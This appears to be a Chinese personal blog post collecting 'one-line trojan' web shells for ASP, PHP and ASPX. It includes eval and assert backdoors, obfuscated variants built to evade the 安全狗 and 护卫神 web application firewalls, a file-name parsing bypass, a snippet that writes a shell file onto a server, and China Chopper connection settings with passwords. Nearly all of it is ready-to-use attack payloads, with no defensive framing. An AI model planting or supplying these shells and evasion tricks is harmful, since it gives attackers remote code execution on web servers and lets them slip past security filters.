笑笑博客

奥特曼躲在墙角哭 被小怪兽看到了 小怪兽心疼的说:别哭了 心情不好了你就打我吧,
 QQ:1258944591

一句话木马

asp一句话木马:<%eval request("x")%>

php一句话木马:<?php eval($_POST[g]);?>

aspx一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["x"],"unsafe");%>

数据库加密一句话(密码a):┼攠數畣整爠煥敵瑳∨≡┩愾

网站配置、版权信息专用一句话:"%><%Eval Request(x)%>

一句话再过护卫神:<%Y=request("x")%> <%execute(Y)%>

过拦截一句话木马:<% eXEcGlOBaL ReQuEsT("x") %>

asp闭合型一句话 %><%eval request("0o1Znz1ow")%><%

能过安全狗的解析格式:;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg

突破安全狗的一句话:<%Y=request("x")%> <%eval(Y)%>

elong过安全狗的php一句话:<?php  $a = "a"."s"."s"."e"."r"."t";  $a($_POST[cc]);  ?>


后台常用写入php一句话(密码x):

<? 
 $fp = @fopen("c.php", 'a'); 
 @fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[x])'."\r\n\r\n?".">\r\n"); 
 @fclose($fp); 
 ?>

 

高强度php一句话:

<?php substr(md5($_REQUEST['heroes']),28)=='acd0'&&eval($_REQUEST['c']);?>


新型变异PHP一句话(密码b4dboy):

($b4dboy = $_POST['b4dboy']) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);

 

突破安全狗的aspx一句话:

<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

 

突破护卫神,保护盾一句话:

<?php $a = str_replace(x,"","axsxxsxexrxxt");
$a($_POST["test"]); ?>

 

许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传,这样一句话木马就写入不进数据库了。

改成:〈scriptlanguage=VBScript runat=server〉execute request("l")〈/Script〉

这样就避开了使用〈%%〉,保存为.ASP,程序照样执行的效果是一样的。

 

PHP高强度一句话:

<?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['c']);?>   菜刀连接:/x.php?x=lostwolf  脚本类型:php  密码:c

<?php assert($_REQUEST["c"]);?>    菜刀连接 躲避检测 密码:c

评论
热度(1)

© 笑笑博客 | Powered by LOFTER